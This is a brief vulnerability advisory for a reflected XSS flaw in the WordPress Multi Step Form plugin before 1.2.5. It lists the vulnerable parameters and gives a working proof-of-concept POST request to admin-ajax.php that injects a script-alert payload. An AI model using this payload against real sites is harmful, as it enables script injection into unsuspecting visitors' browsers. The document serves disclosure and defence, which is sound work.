WordPress Plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks. This issue can be exploited by unauthenticated attackers, by the use of CSRF, for example.
The following parameters are vulnerable in fw_send_data function:
fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email
Proof of Concept (PoC):
The following POST request will cause it to display an alert in the browser when it runs:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close
action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0